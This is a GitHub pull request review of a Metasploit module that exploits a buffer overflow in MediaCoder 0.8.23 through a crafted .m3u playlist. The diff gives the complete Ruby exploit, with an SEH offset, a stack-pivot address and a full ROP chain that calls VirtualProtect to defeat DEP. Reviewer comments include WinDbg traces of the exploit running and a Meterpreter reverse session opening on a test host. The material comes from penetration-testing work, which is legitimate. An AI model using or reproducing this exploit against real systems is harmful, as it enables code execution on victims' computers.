Added MediaCoder exploit module #2081
@@ -0,0 +1,123 @@ | ||
## | ||
# This file is part of the Metasploit Framework and may be subject to | ||
# redistribution and commercial restrictions. Please see the Metasploit | ||
# web site for more information on licensing and terms of use. | ||
# http://metasploit.com/ | ||
## | ||
|
||
require 'msf/core' | ||
|
||
class Metasploit3 < Msf::Exploit::Remote | ||
Rank = NormalRanking | ||
|
||
include Msf::Exploit::FILEFORMAT | ||
include Msf::Exploit::Seh | ||
|
||
def initialize(info = {}) | ||
super(update_info(info, | ||
'Name' => 'MediaCoder .M3U Buffer Overflow', | ||
'Description' => %q{ | ||
This module exploits a buffer overflow in MediaCoder 0.8.23. The vulnerability | ||
occurs when adding an .m3u, allowing arbitrary code execution under the context | ||
of the user. DEP bypass via ROP is supported on Windows 7, since the MediaCoder | ||
runs with DEP. This module has been tested successfully on MediaCoder 0.8.23.5530 | ||
over Windows XP SP3 and Windows 7 SP1. | ||
}, | ||
'License' => MSF_LICENSE, | ||
'Author' => | ||
[ | ||
'metacom', # Vulnerability discovery and PoC | ||
'modpr0be <modpr0be[at]spentera.com>' # Metasploit module | ||
A comma is needed at the end of the entry.

Strange, msftidy doesn't complain about it. Will add it on next commit.

msftidy doesn't check this. But if you run msfconsole, you will see a complaint though :-)
||
'otoy <otoy[at]spentera.com>' # Metasploit module | ||
], | ||
'References' => | ||
[ | ||
[ 'OSVDB', '94522' ], | ||
[ 'EDB', '26403' ] | ||
], | ||
'DefaultOptions' => | ||
{ | ||
'EXITFUNC' => 'seh' | ||
}, | ||
'Platform' => 'win', | ||
'Payload' => | ||
{ | ||
'Space' => 1200, | ||
'BadChars' => "\x00\x5c\x40\x0d\x0a", | ||
'DisableNops' => true, | ||
'StackAdjustment' => -3500, | ||
}, | ||
'Targets' => | ||
[ | ||
[ 'MediaCoder 0.8.23.5530 / Windows XP SP3 / Windows 7 SP1', | ||
Generated test case:

So:

Hmm strange, I can confirm that this works for me from 0.8.22.5525 - 0.8.23.5530. Both tested across VM and physical box.

MediaCoder 0.8.22.5525 - 0.8.23.5530 on Windows 7 SP1 (Physical Box):

(1218.be4): Break instruction exception - code 80000003 (first chance)
eax=7ff9e000 ebx=00000000 ecx=00000000 edx=76e9f17d esi=00000000 edi=00000000
eip=76e3410c esp=06b1ff5c ebp=06b1ff88 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
ntdll!DbgBreakPoint:
76e3410c cc int 3
0:029> g
(1218.1618): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000093 ebx=7577ad60 ecx=04d34c88 edx=fb3fb378 esi=005308c8 edi=000307d0
eip=0042daf3 esp=0012f090 ebp=0012f1f4 iopl=0 nv up ei ng nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210282
*** WARNING: Unable to verify checksum for C:\Program Files\MediaCoder\mediacoder.exe
*** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\MediaCoder\mediacoder.exe
mediacoder+0x2daf3:
0042daf3 88040a mov byte ptr [edx+ecx],al ds:0023:00130000=41
0:000> !exchain
0012f3f4: *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\MediaCoder\postproc-52.dll -
postproc_52+14435 (6afd4435)
Invalid exception stack at 1b765fa5
0:000> bp 0x6afd4435
0:000> g
Breakpoint 0 hit
eax=00000000 ebx=00000000 ecx=6afd4435 edx=76e471ad esi=00000000 edi=00000000
eip=6afd4435 esp=0012eca8 ebp=0012ecc8 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200246
postproc_52+0x14435:
6afd4435 81c4ac070000 add esp,7ACh
0:000> t
eax=00000000 ebx=00000000 ecx=6afd4435 edx=76e471ad esi=00000000 edi=00000000
eip=6afd443b esp=0012f454 ebp=0012ecc8 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200212
postproc_52+0x1443b:
6afd443b 5b pop ebx
*** WARNING: Unable to verify checksum for C:\Program Files\MediaCoder\jpeg.dll
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\MediaCoder\jpeg.dll -
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\MediaCoder\libiconv-2.dll -
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\MediaCoder\avutil-52.dll -
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\MediaCoder\swscale-2.dll -
0:000> t
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=76e471ad esi=00000000 edi=00000000
eip=6afd443c esp=0012f458 ebp=0012ecc8 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200212
postproc_52+0x1443c:
6afd443c 5e pop esi
0:000> t
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=76e471ad esi=6ab16202 edi=00000000
eip=6afd443d esp=0012f45c ebp=0012ecc8 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200212
postproc_52+0x1443d:
6afd443d 5f pop edi
0:000> t
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=76e471ad esi=6ab16202 edi=6ab16202
eip=6afd443e esp=0012f460 ebp=0012ecc8 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200212
postproc_52+0x1443e:
6afd443e 5d pop ebp
0:000> t
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=76e471ad esi=6ab16202 edi=6ab16202
eip=6afd443f esp=0012f464 ebp=6ab16202 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200212
postproc_52+0x1443f:
6afd443f c3 ret
0:000> dd /c1 esp
0012f464 6ab16202
0012f468 6ab16202
0012f46c 6ab16202
0012f470 6ab16202
0012f474 6ab16202
0012f478 6ab16202
0012f47c 6ab16202
0012f480 6ab16202
0012f484 6ab16202
0012f488 100482ff
0012f48c ffffffc0
0012f490 7a69494a
0012f494 66d9d9ba
0012f498 6ab2241d
0012f49c 44716254
0012f4a0 44716254
0012f4a4 44716254
0012f4a8 44716254
0012f4ac 44716254
0012f4b0 44716254
0012f4b4 44716254
0012f4b8 44716254
0012f4bc 44716254
0012f4c0 44716254
0012f4c4 44716254
0012f4c8 44716254
0012f4cc 44716254
0012f4d0 44716254
0012f4d4 44716254
0012f4d8 1004a8ee
0012f4dc 6ab561b0
0012f4e0 66d9feee

in handler:

msf exploit(handler) > exploit
[*] Started reverse handler on 10.10.10.10:443
[*] Starting the payload handler...
[*] Sending stage (751104 bytes) to 10.10.10.11
[*] Meterpreter session 1 opened (10.10.10.10:443 -> 10.10.10.11:1934) at 2013-07-09 02:01:29 +0700
meterpreter > run checkvm
[*] Checking if target is a Virtual Machine .....
[*] It appears to be physical host.
meterpreter > quit

Hmm, not working for me on Win 7 SP1 either. (windows/exec payload):
Strange, works for me with windows/exec payload too.

(88c.10a4): Break instruction exception - code 80000003 (first chance)
eax=7ffdb000 ebx=00000000 ecx=00000000 edx=76e9f17d esi=00000000 edi=00000000
eip=76e3410c esp=02ccff5c ebp=02ccff88 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
ntdll!DbgBreakPoint:
76e3410c cc int 3
0:028> g
(88c.1404): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=000000bd ebx=7577ad60 ecx=04e4d968 edx=fb2e2698 esi=005308c8 edi=000f05c0
eip=0042daf3 esp=0012f090 ebp=0012f1f4 iopl=0 nv up ei ng nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210286
*** WARNING: Unable to verify checksum for C:\Program Files\MediaCoder\mediacoder.exe
*** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\MediaCoder\mediacoder.exe
mediacoder+0x2daf3:
0042daf3 88040a mov byte ptr [edx+ecx],al ds:0023:00130000=41
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\MediaCoder\libiconv-2.dll -
0:000> !exdhain
No export exdhain found
0:000> !exchain
0012f3f4: *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\MediaCoder\postproc-52.dll -
postproc_52+14435 (6afd4435)
Invalid exception stack at e82d1026
0:000> bp 0x6afd4435
0:000> g
Breakpoint 0 hit
eax=00000000 ebx=00000000 ecx=6afd4435 edx=76e471ad esi=00000000 edi=00000000
eip=6afd4435 esp=0012eca8 ebp=0012ecc8 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200246
postproc_52+0x14435:
6afd4435 81c4ac070000 add esp,7ACh
0:000> t
eax=00000000 ebx=00000000 ecx=6afd4435 edx=76e471ad esi=00000000 edi=00000000
eip=6afd443b esp=0012f454 ebp=0012ecc8 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200212
postproc_52+0x1443b:
6afd443b 5b pop ebx
*** WARNING: Unable to verify checksum for C:\Program Files\MediaCoder\jpeg.dll
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\MediaCoder\jpeg.dll -
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\MediaCoder\avutil-52.dll -
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\MediaCoder\swscale-2.dll -
0:000> t
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=76e471ad esi=00000000 edi=00000000
eip=6afd443c esp=0012f458 ebp=0012ecc8 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200212
postproc_52+0x1443c:
6afd443c 5e pop esi
0:000> t
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=76e471ad esi=6ab16202 edi=00000000
eip=6afd443d esp=0012f45c ebp=0012ecc8 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200212
postproc_52+0x1443d:
6afd443d 5f pop edi
0:000> t
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=76e471ad esi=6ab16202 edi=6ab16202
eip=6afd443e esp=0012f460 ebp=0012ecc8 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200212
postproc_52+0x1443e:
6afd443e 5d pop ebp
0:000> t
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=76e471ad esi=6ab16202 edi=6ab16202
eip=6afd443f esp=0012f464 ebp=6ab16202 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200212
postproc_52+0x1443f:
6afd443f c3 ret
0:000> p
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=76e471ad esi=6ab16202 edi=6ab16202
eip=6ab16202 esp=0012f468 ebp=6ab16202 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200212
swscale_2!sws_get_class+0xf002:
6ab16202 c3 ret
0:000> dd /c1 esp
0012f464 6ab16202
0012f468 6ab16202
0012f46c 6ab16202
0012f470 6ab16202
0012f474 6ab16202
0012f478 6ab16202
0012f47c 6ab16202
0012f480 6ab16202
0012f484 6ab16202
0012f488 100482ff
0012f48c ffffffc0
0012f490 6970504f
0012f494 66d9d9ba
0012f498 6ab2241d
0012f49c 7a784c49
0012f4a0 7a784c49
0012f4a4 7a784c49
0012f4a8 7a784c49
0012f4ac 7a784c49
0012f4b0 7a784c49
0012f4b4 7a784c49
0012f4b8 7a784c49
0012f4bc 7a784c49
0012f4c0 7a784c49
0012f4c4 7a784c49
0012f4c8 7a784c49
0012f4cc 7a784c49
0012f4d0 7a784c49
0012f4d4 7a784c49
0012f4d8 1004cc03
0012f4dc 6ab561b0
0012f4e0 66d9feee

I've tested it with 0.8.22.5525 and 0.8.23.5530:

0:000> lmv m mediacoder
start end module name
00400000 005c7000 mediacoder C (no symbols)
Loaded symbol image file: C:\Program Files\MediaCoder\mediacoder.exe
Image path: C:\Program Files\MediaCoder\mediacoder.exe
Image name: mediacoder.exe
Timestamp: Mon Jun 17 23:30:07 2013 (51BF398F)
CheckSum: 00000000
ImageSize: 001C7000
File version: 0.8.22.0
Product version: 0.8.22.0
File flags: 8 (Mask 1F) Private
File OS: 4 Unknown Win32
File type: 0.0 Unknown
File date: 00000000.00000000
Translations: 0409.04b0
CompanyName: Broad Intelligence
ProductName: MediaCoder
InternalName: mediacoder
OriginalFilename: MediaCoder.exe
ProductVersion: 0, 8, 22, 5525
FileVersion: 0, 8, 22, 5525
FileDescription: MediaCoder
LegalCopyright: (C)2005-2013 Developed by Stanley Huang All Rights Reserved
LegalTrademarks: MediaCoder
Comments: http://www.mediacoderhq.com |
||
{ | ||
'Ret' => 0x6afd4435, # stack pivot (add esp,7ac;pop pop pop pop ret) | ||
Ideally you want to print which DLL this address belongs to, better documentation :-)

Noted.
||
'Offset' => 849, | ||
'Max' => 5000 | ||
} | ||
], | ||
], | ||
'Privileged' => false, | ||
'DisclosureDate' => 'Jun 24, 2013', | ||
'DefaultTarget' => 0)) | ||
|
||
register_options( | ||
[ | ||
OptString.new('FILENAME', [ false, 'The file name.', 'msf.m3u']), | ||
], self.class) | ||
|
||
end | ||
|
||
def junk(n=1) | ||
return [rand_text_alpha(4).unpack("L")[0]] * n | ||
Why is the random text repeated
||
end | ||
|
||
def nops(rop=false, n=1) | ||
Isn't this redundant with

No, it isn't; it allows ROP compatible nops, which make_nops doesn't allow. But this function should use make_nops when rop is false. The problem is with the semantics: when asking for 1 nop with rop == false, indeed he is trying to do make_nops(4).
||
return rop ? [0x6ab21799] * n : [0x90909090] * n | ||
I guess this gadget (ret gadget at 0x6ab21799?) is target specific (MediaCoder 0.8.23.5530 in this case). If it's the case, it should be on the target metadata.

Yes you're correct. I'll change it to 0x6ab16202 from swscale-2.dll, that would be universal I think.
||
end | ||
|
||
def exploit | ||
|
||
rop_gadgets = | ||
[ | ||
nops(true,35), # ROP NOP | ||
0x100482ff, # POP EAX # POP EBP # RETN | ||
0xffffffc0, # negate will become 0x00000040 | ||
junk, | ||
0x66d9d9ba, # NEG EAX # RETN | ||
0x6ab2241d, # XCHG EAX,EDX # ADD ESP,2C # POP EBP # POP EDI # POP ESI # POP EBX # RETN | ||
junk(15), # reserve more junk for add esp,2c | ||
0x1004a8ee, # POP ECX # RETN | ||
0x6ab561b0, # ptr to &VirtualProtect() | ||
0x66d9feee, # MOV EAX,DWORD PTR DS:[ECX] # RETN | ||
0x6ab19780, # XCHG EAX,ESI # RETN | ||
0x66d929f5, # POP EAX # POP EBX # RETN | ||
0xfffffcc0, # negate will become 0x0000033f | ||
junk, | ||
0x6ab3c65a, # NEG EAX # RETN | ||
0x1004cc03, # POP ECX # RETN | ||
0xffffffff, # | ||
0x660166e9, # INC ECX # SUB AL,0EB # RETN | ||
0x66d8ae48, # XCHG ECX,EBX # RETN | ||
0x1005f6e4, # ADD EBX,EAX # OR EAX,3000000 # RETN | ||
Which DLL is this? Looks like this ROP chain uses multiple DLLs?

Noted. Will add all rop DLL info.
||
0x6ab3d688, # POP ECX # RETN | ||
0x6ab4ead0, # Writable address | ||
0x100444e3, # POP EDI # RETN | ||
nops(true), # ROP NOP | ||
Why use a

Because of ROP compatible nops, which aren't supported by make_nops.

A ROP NOP is typically an address to a RET instruction. The make_nops() function generates something that replaces 0x90. Two different things.
||
0x10048377, # POP EAX # POP EBP # RETN | ||
nops, # Regular NOPs | ||
Are these nops really needed?
||
0x6ab01c06, # PUSH ESP# RETN | ||
0x6ab28dda, # PUSHAD # RETN | ||
].flatten.pack("V*") | ||
|
||
sploit = "http://" | ||
sploit << rand_text(target['Offset']) | ||
sploit << [target.ret].pack('V') | ||
sploit << rop_gadgets | ||
sploit << make_nops(16) | ||
sploit << payload.encoded | ||
sploit << rand_text(target['Max']-sploit.length) | ||
|
||
file_create(sploit) | ||
end | ||
end |
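Review bot: `Msf::Exploit::Seh` is included at the top of the hunk but nothing in it calls `generate_seh_record`; `exploit` writes the handler address by hand with `[target.ret].pack('V')`, so either drop the include or build the SEH record through the mixin so the two stay consistent. Two documentation points in the same hunk: every hard-coded address (`'Ret' => 0x6afd4435`, `0x6ab21799` in `nops`, and each entry of `rop_gadgets`) should name the DLL it comes from, and the `nops` helper embeds a target-specific gadget that belongs in the `Targets` metadata next to `Ret` rather than in a helper shared by all targets. Finally, the comment on `0xfffffcc0` says the negation yields `0x0000033f`, but `NEG` of `0xfffffcc0` is `0x00000340`; fix the comment so the stated value matches the constant, since readers use these comments to audit the chain.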
Is this mixin used? If it isn't used, the include should be deleted.

Of course, I missed that one. Will be removed on next commit.